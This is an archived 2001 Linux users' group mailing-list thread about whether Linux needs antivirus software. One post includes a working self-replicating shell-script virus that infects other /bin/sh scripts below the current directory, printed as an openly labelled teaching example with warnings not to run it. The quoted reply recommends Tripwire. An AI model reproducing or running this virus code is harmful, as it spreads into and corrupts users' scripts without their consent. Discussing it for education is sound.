[PLUG] anti virus

Scott Minster sminster@purdue.edu
Thu, 20 Sep 2001 11:16:41 -0500 

It is, of course, possible to create a UNIX virus.  There's nothing that
really prevents it.  It is much harder, though.  The different user modes
(normal user and super user) and separation of users help to prevent virus
damage, and the different setups of different machines makes writing a
uniform virus harder.  Tripwire is a good utility, but I've found that it's
not very easy to use (or maybe it is and I just haven't figured out how).
But you can write malicious code for UNIX.  Consider this shell script virus
(PLEASE do NOT run this -- if you do, I am not responsible for the damage):

#!/bin/sh
( V_s=$0;i () { ( e=echo; $e 1 r \!sed -n 2p $V_s;$e w;$e q) | ed -s $1;}; d
() { if [ -w $1 -a "`head -1 $1`" = "#!/bin/sh" -a "`grep -n V_i $1`" =
"" ]; then i $1; fi;}; for b in `find . -type f -print`;do d $b;done; ) &

echo I am a shell virus

The line right after #!/bin/sh is the virus line and is run whenever you run
the script.  It looks for other scripts in the current directory and below
and infects them with the same line.

So remember to always be very cautious with programs you get from other
people.  And DON'T RUN THE ABOVE SCRIPT!

----
Scott Minster
sminster@purdue.edu
http://mland.dhs.org/
icq://18777468/

-----Original Message-----
From: plug-admin@csociety.purdue.edu
[mailto:plug-admin@csociety.purdue.edu]On Behalf Of David C. Hansen
Sent: Thursday, September 20, 2001 10:56 AM
To: Leon; plug@csociety.purdue.edu
Subject: Re: [PLUG] anti virus


Leon wrote:
>
> Is there anti virus software for mandrake linux?  does it come
> preinstalled with it?  I don't want to get hte nimda virus
As the other posters said, there very little danger from virii in a UNIX
environment.  The biggest threat is from people.  One of the best tools
to detect the success of these attacks is Tripwire, which I believe
originated right here at Purdue.
http://www.tripwire.org/
Tripwire records signatures of all kinds of files, from "ls" to
"/etc/hosts" to your kernel image.  If one of these files changes
without reason, it is a good sign of an attack.

Anybody else have anything to add?  Tripwire is the second best reason
that I can come up with when people ask why UNIX doesn't have anti-virus
programs.
--
David C. Hansen
dave@sr71.net
ICQ: 7785546
AIM: HansenDC79
____________________________________________________
The Purdue Linux Users' Group (PLUG) mailing list.
For account maintenance, go to:
plug mailing list  -  plug@csociety.purdue.edu
http://csociety.ecn.purdue.edu/mailman/listinfo/plug